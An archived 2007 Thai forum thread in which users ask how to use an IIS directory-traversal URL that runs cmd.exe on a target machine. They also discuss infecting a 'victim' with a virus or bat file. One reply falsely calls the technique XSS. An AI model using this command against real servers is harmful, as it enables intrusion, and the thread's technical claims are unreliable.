พอดีผมได้ code ที่พิมในช่อง address อ่ะคัฟ แต่ไม่รู้ใช้ยังไง [Archive]

View Full Version : พอดีผมได้ code ที่พิมในช่อง address อ่ะคัฟ แต่ไม่รู้ใช้ยังไง

victorlog

29-08-2007, 09:19 PM

พอดีได้ code ที่เขียนในช่อง address อ่ะคัฟที่ขึ้นว่า

http://ip>เครื่องเป้าหมาย/scripts/...%2...em32/cmd.exe?/c (http://ip>เครื่องเป้าหมาย/scripts/...%255c../winnt/system32/cmd.exe?/c) dir c:\

ผมรู้ว่ามันเป็นการเข้าดูอะไรสักอย่างที่ dir c แต่ผมลองแร้วมันใช้ กับ ie 7 ไม่ได้อ่ะคัฟ

รบกวนผู้รู้ตอบทีคัฟ

geokung

29-08-2007, 11:56 PM

มันเป็นวิธี Hack แบบ XSS (Cross Site Scripting)คับ

**Hidden Content: Check the thread to see hidden data.**

ถ้าอยากได้ความรู้ก็ต้องพยายามนะครับ

choco2006

30-08-2007, 12:04 AM

พออ่านแล้วเริ่มสงสัยที่บอกว่าlinuxป้องกันไว้แล้ว
ถ้างั้น xpล่ะคะ มันกันได้รึเปล่าเอ่ย

obakung

01-09-2007, 07:39 PM

ลองแล้วครับลองกับ WIN XP ผลออกมาว่า ไม่ได้ ซึ่ง ณ เวลานี้และระดับความรู้ระดับผมเนี่ย ยังไม่สามารถเข้าไปที่เครื่องเหยือได้ หากว่าไม่ส่งหนอนบ่อนไส้เข้าไปก่อน (หมายถึงพวกไวรัส หรือ ไฟล์ bat น่ะครับ) ดังนั้นต้องหาวิธีต่อไปครับ